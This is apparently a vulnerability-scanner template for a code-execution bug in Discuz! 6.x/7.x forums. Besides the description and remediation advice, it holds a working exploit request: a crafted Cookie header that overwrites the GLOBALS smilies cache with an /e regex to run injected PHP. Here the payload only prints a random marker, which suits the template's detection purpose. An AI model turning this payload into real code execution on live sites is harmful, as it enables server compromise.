id: Wooyun-2010-080723
info:
  name: Discuz 7.x/6.x global variable defense bypass leading to code execution
  author:
  - l0ne1y
  description: |-
    Discuz! 6.x/7.x global variable defense bypass leading to code execution vulnerability.
    Discuz! is a generic community forum software system.

    Unauthorized-access vulnerabilities include horizontal privilege escalation, vertical privilege escalation, and unauthorized access. In web programs, improper permission control allows users to access or operate on data they are not authorized to access, i.e., unauthorized access.
  severity: critical
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. When executing functions that can evaluate strings as code, strictly validate the parameters passed by the user, and avoid letting users control parameters when possible.
    Temporary Fix:<br />1. Avoid executing external applications or commands whenever possible.<br />2. Use custom functions or function libraries to implement the functionality of external applications or commands.<br />3. Validate parameter content before executing functions that run commands, such as system and eval.<br />4. Use the escapeshellarg function to handle related parameters. escapeshellarg escapes any characters that could terminate arguments or commands. For example, a single quote is escaped, a double quote is escaped, and a semicolon (";") is escaped, restricting the parameter content within a pair of single or double quotes, escaping any single or double quotes it contains so they cannot truncate the current execution, thereby preventing command injection attacks.
requests:
- matchers:
  - type: word
    part: body
    words:
    - '{{randstr}}'
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/viewthread.php?tid=10'
  method: GET
  headers:
    Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r({{randstr}}));
